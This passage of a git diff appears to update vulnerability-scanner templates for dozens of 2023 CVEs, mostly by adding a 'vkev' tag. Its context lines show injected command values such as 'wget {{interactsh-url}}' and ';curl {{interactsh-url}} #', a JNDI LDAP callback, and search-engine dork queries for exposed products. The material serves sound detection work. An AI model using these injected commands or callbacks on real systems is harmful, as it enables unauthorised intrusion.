cve,cve2023,prestashop,tshirtecommerce,sqli + tags: cve,cve2023,prestashop,tshirtecommerce,sqli,vkev flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-27639.yaml b/http/cves/2023/CVE-2023-27639.yaml index 648c2ec974d..fb852167110 100644 --- a/http/cves/2023/CVE-2023-27639.yaml +++ b/http/cves/2023/CVE-2023-27639.yaml @@ -25,7 +25,7 @@ info: product: custom_product_designer framework: prestashop google-query: inurl:"/tshirtecommerce/" - tags: cve,cve2023,prestashop,tshirtecommerce,lfi + tags: cve,cve2023,prestashop,tshirtecommerce,lfi,vkev http: - method: POST diff --git a/http/cves/2023/CVE-2023-27640.yaml b/http/cves/2023/CVE-2023-27640.yaml index b70dc66bf9f..ff2aee091e8 100644 --- a/http/cves/2023/CVE-2023-27640.yaml +++ b/http/cves/2023/CVE-2023-27640.yaml @@ -24,7 +24,7 @@ info: product: custom_product_designer framework: prestashop google-query: inurl:"/tshirtecommerce/" - tags: cve,cve2023,prestashop,tshirtecommerce,lfi + tags: cve,cve2023,prestashop,tshirtecommerce,lfi,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-2796.yaml b/http/cves/2023/CVE-2023-2796.yaml index 379c6cb366d..b0bb5693b6c 100644 --- a/http/cves/2023/CVE-2023-2796.yaml +++ b/http/cves/2023/CVE-2023-2796.yaml @@ -41,7 +41,7 @@ info: - /wp-content/plugins/eventon/ - /wp-content/plugins/eventon-lite/ google-query: inurl:"/wp-content/plugins/eventon/" - tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon + tags: cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-28121.yaml b/http/cves/2023/CVE-2023-28121.yaml index ba2cd9192de..0de4ba21807 100644 --- a/http/cves/2023/CVE-2023-28121.yaml +++ b/http/cves/2023/CVE-2023-28121.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/woocommerce-payments publicwww-query: /wp-content/plugins/woocommerce-payments google-query: inurl:/wp-content/plugins/woocommerce-payments - tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,automattic,vkev variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-28343.yaml b/http/cves/2023/CVE-2023-28343.yaml index 56be950aa46..23780728c07 100644 --- a/http/cves/2023/CVE-2023-28343.yaml +++ b/http/cves/2023/CVE-2023-28343.yaml @@ -35,7 +35,7 @@ info: google-query: - intitle:"Altenergy Power Control Software" - intitle:"altenergy power control software" - tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems + tags: cve,cve2023,oast,altenergy,iot,packetstorm,apsystems,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-28432.yaml b/http/cves/2023/CVE-2023-28432.yaml index be23003af64..18782ad50e8 100644 --- a/http/cves/2023/CVE-2023-28432.yaml +++ b/http/cves/2023/CVE-2023-28432.yaml @@ -41,7 +41,7 @@ info: google-query: - intitle:"minio browser" - intitle:"minio console" - tags: cve,cve2023,minio,console,exposure,kev + tags: cve,cve2023,minio,console,exposure,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-29298.yaml b/http/cves/2023/CVE-2023-29298.yaml index 80e47697b56..49350f53a20 100644 --- a/http/cves/2023/CVE-2023-29298.yaml +++ b/http/cves/2023/CVE-2023-29298.yaml @@ -38,7 +38,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev + tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-29300.yaml b/http/cves/2023/CVE-2023-29300.yaml index b263f4c2d63..46c3d6b5b1e 100644 --- a/http/cves/2023/CVE-2023-29300.yaml +++ b/http/cves/2023/CVE-2023-29300.yaml @@ -38,7 +38,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev + tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev,vkev variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/rcrzfd" diff --git a/http/cves/2023/CVE-2023-29357.yaml b/http/cves/2023/CVE-2023-29357.yaml index f5cea92bf6c..e7b778f5fb6 100644 --- a/http/cves/2023/CVE-2023-29357.yaml +++ b/http/cves/2023/CVE-2023-29357.yaml @@ -30,7 +30,7 @@ info: fofa-query: - app="Microsoft-SharePoint" - app="microsoft-sharepoint" - tags: cve,cve2023,microsoft,sharepoint_server,kev + tags: cve,cve2023,microsoft,sharepoint_server,kev,vkev variables: client_id: "00000003-0000-0ff1-ce00-000000000000" diff --git a/http/cves/2023/CVE-2023-2982.yaml b/http/cves/2023/CVE-2023-2982.yaml index 76bbff828aa..72985a1cb3e 100644 --- a/http/cves/2023/CVE-2023-2982.yaml +++ b/http/cves/2023/CVE-2023-2982.yaml @@ -29,7 +29,7 @@ info: vendor: miniorange product: wordpress_social_login_and_register_\(discord\,_google\,_twitter\,_linkedin\) framework: wordpress - tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange + tags: cve,cve2023,wp,wordpress,wp-plugin,auth-bypass,miniorange,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-29919.yaml b/http/cves/2023/CVE-2023-29919.yaml index 48c1027a2db..8a9cc04adf9 100644 --- a/http/cves/2023/CVE-2023-29919.yaml +++ b/http/cves/2023/CVE-2023-29919.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.html:"SolarView Compact" - cpe:"cpe:2.3:h:contec:solarview_compact" - tags: cve,cve2023,lfi,solarview,edb,contec + tags: cve,cve2023,lfi,solarview,edb,contec,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-30150.yaml b/http/cves/2023/CVE-2023-30150.yaml index 79ec5acac79..55ed03aec83 100644 --- a/http/cves/2023/CVE-2023-30150.yaml +++ b/http/cves/2023/CVE-2023-30150.yaml @@ -32,7 +32,7 @@ info: shodan-query: - http.component:"Prestashop" - http.component:"prestashop" - tags: time-based-sqli,cve2023,cve,prestashop,sqli,leotheme + tags: time-based-sqli,cve2023,cve,prestashop,sqli,leotheme,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-30258.yaml b/http/cves/2023/CVE-2023-30258.yaml index a4a81a1106c..245b7dae832 100644 --- a/http/cves/2023/CVE-2023-30258.yaml +++ b/http/cves/2023/CVE-2023-30258.yaml @@ -29,7 +29,7 @@ info: product: magnusbilling shodan-query: http.html:"magnusbilling" fofa-query: body="magnusbilling" - tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution + tags: cve,cve2023,packetstorm,magnusbilling,rce,oast,unauth,intrusive,magnussolution,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-30625.yaml b/http/cves/2023/CVE-2023-30625.yaml index 703442f4d85..a1cb4dc3405 100644 --- a/http/cves/2023/CVE-2023-30625.yaml +++ b/http/cves/2023/CVE-2023-30625.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: rudderstack product: rudder-server - tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli + tags: cve,cve2023,packetstorm,rudder,rudderstack,sqli,vkev variables: cmd: "wget {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index 8bbc6676ec0..16179cbf5e3 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -29,7 +29,7 @@ info: vendor: advancedcustomfields product: advanced_custom_fields framework: wordpress - tags: cve2023,cve,wpscan,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields + tags: cve2023,cve,wpscan,advance-custom-field,wp,wp-plugin,wordpress,authenticated,xss,advancedcustomfields,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index dcc45107edd..e965cf206b3 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -33,7 +33,7 @@ info: - title="Repetier-Server" - title="repetier-server" google-query: intitle:"repetier-server" - tags: cve2023,cve,repetier,lfi,repetier-server + tags: cve2023,cve,repetier,lfi,repetier-server,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-3139.yaml b/http/cves/2023/CVE-2023-3139.yaml index 6c1079ca896..2f11e229c4c 100644 --- a/http/cves/2023/CVE-2023-3139.yaml +++ b/http/cves/2023/CVE-2023-3139.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:"/wp-content/plugins/protect-wp-admin" fofa-query: body="/wp-content/plugins/protect-wp-admin/" publicwww-query: "/wp-content/plugins/protect-wp-admin/" - tags: cve,cve2023,wordpress,wp-plugin,protect-wp-admin,unauth,wpscan + tags: cve,cve2023,wordpress,wp-plugin,protect-wp-admin,unauth,wpscan,vkev flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-31446.yaml b/http/cves/2023/CVE-2023-31446.yaml index 6499430448f..c1f97b94ec8 100644 --- a/http/cves/2023/CVE-2023-31446.yaml +++ b/http/cves/2023/CVE-2023-31446.yaml @@ -28,7 +28,7 @@ info: - html:"Cassia Bluetooth Gateway Management Platform" - http.html:"cassia bluetooth gateway management platform" fofa-query: body="cassia bluetooth gateway management platform" - tags: cve,cve2023,rce,cassia,gateway,cassianetworks + tags: cve,cve2023,rce,cassia,gateway,cassianetworks,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index 3a6631b46d9..24d71db70cd 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -23,7 +23,7 @@ info: product: timekeeper shodan-query: http.favicon.hash:2134367771 fofa-query: icon_hash=2134367771 - tags: cve,cve2023,timekeeper,rce,oast,fsmlabs + tags: cve,cve2023,timekeeper,rce,oast,fsmlabs,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-31478.yaml b/http/cves/2023/CVE-2023-31478.yaml index 041499cc73a..884ccb3e932 100644 --- a/http/cves/2023/CVE-2023-31478.yaml +++ b/http/cves/2023/CVE-2023-31478.yaml @@ -21,7 +21,7 @@ info: verified: true max-request: 1 shodan-query: title:"GL.iNet Admin Panel" - tags: cve,cve2023,gl-inet,disclosure + tags: cve,cve2023,gl-inet,disclosure,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 20f6c29150a..a2f718b0d58 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -31,7 +31,7 @@ info: shodan-query: - http.component:"Ghost" - http.component:"ghost" - tags: cve2023,cve,lfi,ghostcms,ghost,node.js + tags: cve2023,cve,lfi,ghostcms,ghost,node.js,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 27005d3d9b8..7789b9845ca 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -31,7 +31,7 @@ info: product: essential_addons_for_elementor framework: wordpress google-query: inurl:/wp-content/plugins/essential-addons-for-elementor-lite - tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper + tags: cve2023,cve,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpdeveloper,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index a41fc050f4b..2b4e88ca430 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -39,7 +39,7 @@ info: google-query: - intitle:"openfire" - intitle:"openfire admin console" - tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime + tags: cve2023,cve,auth-bypass,openfire,console,kev,igniterealtime,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 2883966e812..d0ac2fc2bef 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: ivanti product: avalanche - tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive + tags: cve,cve2023,ivanti,avalanche,rce,oast,unauth,intrusive,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index 67999094371..c4616ba410d 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -31,7 +31,7 @@ info: framework: wordpress shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 - tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress + tags: cve2023,cve,jeecg,lfi,jeecg_p3_biz_chat_project,wordpress,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index c2d994346a2..3145c8c6152 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -27,7 +27,7 @@ info: fofa-query: - app="H3C-Ent-Router" - app="h3c-ent-router" - tags: cve2023,cve,router,rce,h3c + tags: cve2023,cve,router,rce,h3c,vkev variables: filename: "{{to_lower(rand_text_alpha(7))}}" diff --git a/http/cves/2023/CVE-2023-3368.yaml b/http/cves/2023/CVE-2023-3368.yaml index 40f002e842c..e6a3a714104 100644 --- a/http/cves/2023/CVE-2023-3368.yaml +++ b/http/cves/2023/CVE-2023-3368.yaml @@ -31,7 +31,7 @@ info: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" - tags: cve2023,cve,chamilo,unauth,cmd,rce + tags: cve2023,cve,chamilo,unauth,cmd,rce,vkev http: - method: POST diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index 6745cdba7d7..f6c2bf23a10 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -27,7 +27,7 @@ info: fofa-query: - title="FUXA" - title="fuxa" - tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth + tags: cve,cve2023,rce,intrusive,frangoteam,fuxa,unauth,vkev variables: filename: "{{rand_base(6)}}" diff --git a/http/cves/2023/CVE-2023-34105.yaml b/http/cves/2023/CVE-2023-34105.yaml index 4c2e93221f4..08dd34e895a 100644 --- a/http/cves/2023/CVE-2023-34105.yaml +++ b/http/cves/2023/CVE-2023-34105.yaml @@ -23,7 +23,7 @@ info: shodan-query: http.favicon.hash:1386054408 verified: true max-request: 1 - tags: cve,cve2023,srs,rce,oast + tags: cve,cve2023,srs,rce,oast,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 6ffb763ac5c..91e38c8445d 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -36,7 +36,7 @@ info: - icon_hash="475145467" - icon_hash="1624375939" - app="zimbra-邮件系统" - tags: cve,cve2023,zimbra,xss,authenticated,kev + tags: cve,cve2023,zimbra,xss,authenticated,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 0ccca1ea4e7..e4670a8a347 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -31,7 +31,7 @@ info: product: moveit_cloud shodan-query: http.favicon.hash:989289239 fofa-query: icon_hash=989289239 - tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress + tags: cve2023,cve,packetstorm,moveit,rce,sqli,intrusive,kev,progress,vkev variables: sessioncookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 42029171fdd..722c4e2fada 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -33,7 +33,7 @@ info: - http.favicon.hash:-165631681 - http.favicon.hash:"-165631681" fofa-query: icon_hash="-165631681" - tags: cve2023,cve,gibbon,lfi,gibbonedu + tags: cve2023,cve,gibbon,lfi,gibbonedu,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index a1612aeb637..b09aa74296e 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -34,7 +34,7 @@ info: fofa-query: body=/wp-content/plugins/ultimate-member publicwww-query: /wp-content/plugins/ultimate-member google-query: inurl:/wp-content/plugins/ultimate-member - tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember + tags: cve,cve2023,wordpress,wp,wp-plugin,auth-bypass,intrusive,wpscan,ultimatemember,vkev variables: username: "{{rand_base(6)}}" password: "{{rand_base(8)}}" diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 16e3c876959..a115e0ad61e 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -28,7 +28,7 @@ info: product: jeecg_boot shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 - tags: cve2023,cve,jeecg,sqli + tags: cve2023,cve,jeecg,sqli,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 25c5cc53da7..1538cacbcc7 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -33,7 +33,7 @@ info: - http.component:"Chamilo" - http.component:"chamilo" - cpe:"cpe:2.3:a:chamilo:chamilo" - tags: cve,cve2023,packetstorm,chamilo + tags: cve,cve2023,packetstorm,chamilo,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-34993.yaml b/http/cves/2023/CVE-2023-34993.yaml index 997bc596754..5714ce18f6b 100644 --- a/http/cves/2023/CVE-2023-34993.yaml +++ b/http/cves/2023/CVE-2023-34993.yaml @@ -36,7 +36,7 @@ info: - body="fortiwlm" - title="fortiwlm" google-query: intitle:"fortiwlm" - tags: cve,cve2023,fortinet,fortiwlm,rce,unauth + tags: cve,cve2023,fortinet,fortiwlm,rce,unauth,vkev variables: progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log" diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 3ba21db362e..f8d942b3edf 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -32,7 +32,7 @@ info: - http.favicon.hash:362091310 - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" - tags: cve,cve2023,kev,ivanti,mobileiron,epmm + tags: cve,cve2023,kev,ivanti,mobileiron,epmm,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 0e8bc2687cc..5ad800e79da 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -32,7 +32,7 @@ info: - http.favicon.hash:362091310 - http.favicon.hash:"362091310" fofa-query: icon_hash="362091310" - tags: cve2023,cve,ivanti,mobileiron,epmm,kev + tags: cve2023,cve,ivanti,mobileiron,epmm,kev,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index faed4103c82..6385038a5b5 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -29,7 +29,7 @@ info: - http.title:"sitecore" fofa-query: title="sitecore" google-query: intitle:"sitecore" - tags: cve2023,cve,sitecore,rce + tags: cve2023,cve,sitecore,rce,vkev variables: string: "{{rand_base(6)}}" payload: | diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 5217326efc3..fd6baeee0d9 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -31,7 +31,7 @@ info: product: nocodb shodan-query: http.favicon.hash:-2017596142 fofa-query: icon_hash=-2017596142 - tags: cve2023,cve,nocodb,lfi + tags: cve2023,cve,nocodb,lfi,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 5bf670798d0..64f04fb4790 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -37,7 +37,7 @@ info: - http.title:"lightdash" fofa-query: title="lightdash" google-query: intitle:"lightdash" - tags: cve,cve2023,lightdash,lfi + tags: cve,cve2023,lightdash,lfi,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index 86e855764d8..d213312a380 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -37,7 +37,7 @@ info: - icon_hash="151132309" - title="cloudpanel" google-query: intitle:"cloudpanel" - tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload + tags: cve2023,cve,cloudpanel,rce,intrusive,mgt-commerce,fileupload,vkev variables: session: "ZGVmNTAyMDA3ZDI0OGNjZmU0NTVkMGQ2NmJhMjUxYjdhYzg0NzcyYzBmNjM0ODg0ODY0OWYyZTQ0MjgwZDVjZDBjNmY3MWJiZWU4ZTM4OTU4ZmE4YjViNjE4MGJiZjQ4NzA3MzcwNTJiNzFhM2JjYTBmNTdiODQ4ZDZjYjhiNmY1N2U3YTM1YWY3YjA3MTM1ZTlkYjViMjY5OTkzM2Q3NTAyOWI0ZGQ5ZDZmOTFhYTVlZTRhZjg0ZTBmZTU5NjY4NGI4OGU0NjVkNDU4MWYxOTc2MGNiMGI0ZGY2MmZjM2RkMmI4N2RhMzJkYTU4NjNjMWFmMGZlOWIwZjcyZGRkNmFhYzk3ZGVlZmY=" str1: "{{rand_base(10)}}" diff --git a/http/cves/2023/CVE-2023-36144.yaml b/http/cves/2023/CVE-2023-36144.yaml index c5d15f965a6..05567aa7c91 100644 --- a/http/cves/2023/CVE-2023-36144.yaml +++ b/http/cves/2023/CVE-2023-36144.yaml @@ -30,7 +30,7 @@ info: - http.title:"intelbras" fofa-query: title="intelbras" google-query: intitle:"intelbras" - tags: cve2023,cve,intelbras,switch,exposure + tags: cve2023,cve,intelbras,switch,exposure,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index f86dae72fba..4a1943bae63 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -30,7 +30,7 @@ info: vendor: juniper product: srx100 shodan-query: title:"Juniper Web Device Manager" - tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev + tags: cve2023,cve,packetstorm,juniper,php,rce,intrusive,fileupload,kev,vkev variables: string: "CVE-2023-36844" payload: "('')" diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index e8a28d1f99f..f2935b5c9f1 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -32,7 +32,7 @@ info: - http.title:"juniper web device manager" fofa-query: title="juniper web device manager" google-query: intitle:"juniper web device manager" - tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev + tags: cve,cve2023,packetstorm,rce,unauth,juniper,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 0cd3124e5e4..ab86fdaa9ad 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -31,7 +31,7 @@ info: product: moveit_transfer shodan-query: http.favicon.hash:989289239 fofa-query: icon_hash=989289239 - tags: cve,cve2023,moveit,rce,sqli,intrusive,progress + tags: cve,cve2023,moveit,rce,sqli,intrusive,progress,vkev variables: session_cookie: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index c7b0180eeb9..07b133168c6 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -27,7 +27,7 @@ info: product: pm43_firmware shodan-query: http.html:"/main/login.lua?pageid=" fofa-query: body="/main/login.lua?pageid=" - tags: cve2023,cve,honeywell,pm43,printer,iot,rce + tags: cve2023,cve,honeywell,pm43,printer,iot,rce,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-3722.yaml b/http/cves/2023/CVE-2023-3722.yaml index c8b38444e37..ff75de0980a 100644 --- a/http/cves/2023/CVE-2023-3722.yaml +++ b/http/cves/2023/CVE-2023-3722.yaml @@ -24,7 +24,7 @@ info: product: aura_device_services shodan-query: html:"Avaya Aura® Utility Services" fofa-query: body="Avaya Aura® Utility Services" - tags: cve,cve2023,avaya,rce,upload,deviceservices,intrusive + tags: cve,cve2023,avaya,rce,upload,deviceservices,intrusive,vkev variables: filename: "{{randbase(8)}}" diff --git a/http/cves/2023/CVE-2023-37580.yaml b/http/cves/2023/CVE-2023-37580.yaml index 16f9b8b3063..d4a56b7ff5c 100644 --- a/http/cves/2023/CVE-2023-37580.yaml +++ b/http/cves/2023/CVE-2023-37580.yaml @@ -32,7 +32,7 @@ info: - http.favicon.hash:475145467 - http.favicon.hash:"475145467" fofa-query: icon_hash="475145467" - tags: cve2023,cve,zimbra,xss,authenticated,kev + tags: cve2023,cve,zimbra,xss,authenticated,kev,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-37679.yaml b/http/cves/2023/CVE-2023-37679.yaml index 249fa50114d..d6312c01e06 100644 --- a/http/cves/2023/CVE-2023-37679.yaml +++ b/http/cves/2023/CVE-2023-37679.yaml @@ -30,7 +30,7 @@ info: - http.title:"mirth connect administrator" fofa-query: title="mirth connect administrator" google-query: intitle:"mirth connect administrator" - tags: packetstorm,cve2023,cve,nextgen,rce + tags: packetstorm,cve2023,cve,nextgen,rce,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-38035.yaml b/http/cves/2023/CVE-2023-38035.yaml index 0ce0e2a18d1..19207175e81 100644 --- a/http/cves/2023/CVE-2023-38035.yaml +++ b/http/cves/2023/CVE-2023-38035.yaml @@ -33,7 +33,7 @@ info: - 'html:"Note: Requires a local Sentry administrative user"' - 'http.html:"note: requires a local sentry administrative user"' fofa-query: 'body="note: requires a local sentry administrative user"' - tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast + tags: cve2023,cve,packetstorm,ivanti,mobileiron,sentry,kev,rce,auth-bypass,oast,vkev variables: oast: "{{interactsh-url}}/?" padstr: "{{randstr}}" diff --git a/http/cves/2023/CVE-2023-38192.yaml b/http/cves/2023/CVE-2023-38192.yaml index 7d08df05e95..d0cd6ed5915 100644 --- a/http/cves/2023/CVE-2023-38192.yaml +++ b/http/cves/2023/CVE-2023-38192.yaml @@ -28,7 +28,7 @@ info: vendor: superwebmailer product: superwebmailer shodan-query: title:"SuperWebMailer" - tags: cve,cve2023,superwebmailer,xss + tags: cve,cve2023,superwebmailer,xss,vkev http: - raw: diff --git a/http/cves/2023/CVE-2023-38203.yaml b/http/cves/2023/CVE-2023-38203.yaml index 1a5cff093c1..6f4877968b0 100644 --- a/http/cves/2023/CVE-2023-38203.yaml +++ b/http/cves/2023/CVE-2023-38203.yaml @@ -36,7 +36,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev + tags: cve,cve2023,adobe,rce,coldfusion,deserialization,kev,vkev variables: callback: "{{interactsh-url}}" jndi: "ldap%3a//{{callback}}/zdfzfd" diff --git a/http/cves/2023/CVE-2023-38205.yaml b/http/cves/2023/CVE-2023-38205.yaml index 4db77b3326b..7e602442a88 100644 --- a/http/cves/2023/CVE-2023-38205.yaml +++ b/http/cves/2023/CVE-2023-38205.yaml @@ -38,7 +38,7 @@ info: - app="adobe-coldfusion" - title="coldfusion administrator login" google-query: intitle:"coldfusion administrator login" - tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev + tags: cve2023,cve,adobe,auth-bypass,coldfusion,kev,vkev http: - method: GET diff --git a/http/cves/2023/CVE-2023-3836.yaml b/http/cves/2023/CVE-2023-3836.yaml index c13814bb586..2d717599e28 100644 --- a/http/cves/2023/CVE-2023-3836.yaml +++ b/http/cves/2023/CVE-2023-3836.yaml @@ -32,7 +32,7 @@ info: - http.html:"/wpms/asset" fofa-query: body="/wpms/asset" zoomeye-query: app="大华智慧园区综合管理平台" - tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity + tags: cve2023,cve,dahua,fileupload,intrusive,rce,dahuasecurity,vkev variables: random_str: "{{rand_base(6)}}" match_str: "{{md5(random_str)}}" diff --git 